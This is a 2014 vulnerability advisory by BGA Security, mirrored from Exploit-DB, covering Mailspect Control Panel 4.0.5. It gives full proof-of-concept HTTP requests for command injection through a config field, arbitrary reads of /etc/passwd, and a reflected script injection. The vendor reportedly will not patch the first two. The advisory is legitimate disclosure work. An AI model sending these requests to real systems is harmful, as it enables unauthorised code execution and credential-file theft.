bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/cgi/webapps/33887.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

147 lines
No EOL
7.3 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

Document Title:
============
Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities
Release Date:
===========
June 21, 2014
Product & Service Introduction:
========================
Mailspect is the email security and archiving brand of RAE Internet Inc., Tarrytown, New York. The Mailspect product suite was launched
in 2005 as a Control Panel for Open Source antispam and antivirus scanning engines such as Clamd and Spamassassin.
Mailspect Defense offered easy-to-use configuration and update tools and an integrated Quaratine Solution and Mail Filter. Subsequently,
the Control Panel has expanded to include commercial scanning engines such as Cloudmark, ESET, F-FROT, Mailshell, and Sophos and built-in
content filers and reputation engines.
Abstract Advisory Information:
=======================
BGA Team discovered a remote code execution, two arbitrary file read and one cross site scripting vulnerability in Mailspect Control Panel
4.0.5 web application.
Vulnerability Disclosure Timeline:
=========================
May 4, 2014 : Contact with Vendor
May 16, 2014 : Vendor Response
June 21, 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Multilayered Email Security & Archive for Gateways, MTA's & Servers
Product: Mailspect Control Panel 4.0.5
Other versions may be affected.
Exploitation Technique:
==================
RCE: Remote, Authenticated
AFR: Remote, Authenticated
XSS: Remote, Unauthenticated
Severity Level:
===========
High
Technical Details & Description:
========================
1. Sending a POST request to "/system_module.cgi" with config_version_cmd parameter's value set to a linux command group like "whoami >
/tmp/who; /usr/local/MPP/mppd -v" causes the former command's execution by sending a GET request (or simply visiting) to
"status_info.cgi?group=default" page.
Other parameters with the suffix "_cmd" are probably vulnerable.
2. Sending a GET request to "/monitor_logs_ctl.cgi" with log_dir parameter's value set to "/" and log_file's value set to an arbitrary
file name like "/etc/passwd" will cause the file's content's disclosure.
3. Sending a POST request to "/monitor_manage_logs.cgi" with log_file parameter's value set to an arbitrary file name like "/etc/passwd"
will cause the file's content's disclosure.
4. Sending a POST request to "/monitor_manage_logs.cgi" with login parameter's value set to "></script>js to be executed<script/> leads
the Javascript code's execution.
Proof of Concept (PoC):
==================
Proof of Concept RCE Request:
POST /system_module.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/system_module.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1282
post=1&config_mppd_conf=%2Fusr%2Flocal%2FMPP%2Fmppd.conf.xml&config_language=&config_log_dir=%2Fvar%2Flog%2FMPP%2F&config_version_cmd=whoami+%3E+%2Ftmp%2Fwho%3B+%2Fusr%2Flocal%2FMPP%2Fmppd+-v&config_licence_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-l+%2Fusr%2Flocal%2FMPP%2Fkey.txt&config_start_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd&config_stop_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-s&config_restart_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-r&config_sophos_daily=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fsophosdaily.sh&config_sophos_monthly=%2Fusr%2Flocal%2FMPP%2Fscripts%2Fsophosmonthly.pl&config_fprot_update=%2Fusr%2Flocal%2Ff-prot%2Ftools%2Fcheck-updates.pl&config_cloudmark_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fcloudmarkupdate.sh&config_cgate_submitted=%2Fvar%2FCommuniGate%2FSubmitted&config_clamav_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fclamavupdate.sh&config_cloudmark_dir=%2Fusr%2Flocal%2FMPP%2Fcloudmark&config_mailshell_dir=%2Fusr%2Flocal%2FMPP%2Fmailshell&config_fprot_dir=&config_pid_file=%2Fvar%2Frun%2Fmppd.pid&config_mailshell_update=%2Fusr%2Flocal%2FMPP%2Fmailshellupdate&config_mpp_parser_log_dir=%2Fvar%2Flog%2FMPP%2F%2Fplog&config_mpp_parser_time_interval=20&page_refresh=60
2. Proof of Concept AFR Request 1:
GET /monitor_logs_ctl.cgi?log_file=/etc/passwd&log_dir=/&mode=tail&lines=50&filter=&dummy=0.4426060212816081 HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_realtime_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
3. Proof of Concept AFR Request 2:
POST /monitor_manage_logs.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_manage_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
group=default&post=1&log_file=/etc/passwd&download=Download&save_to_dir=&tar_gzip=on
4. Proof of Concept XSS Request:
GET /login.cgi?login=abc%22%3E%3Cscript%3Ealert(/bga/)%3C/script%3E HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Solution Fix & Patch:
================
XSS will be patched at version 4.0.7
There will be no patch for RCE and AFR vulnerabilities as stated at the vendors reply.
Security Risk:
==========
The risk of the vulnerabilities above estimated as high.
Credits & Authors:
==============
Bilgi Guvenligi AKADEMISI - Onur ALANBEL, Ender AKBAŞ
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Domain: www.bga.com.tr/advisories.html
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA Security
Reference in a new issue View git blame Copy permalink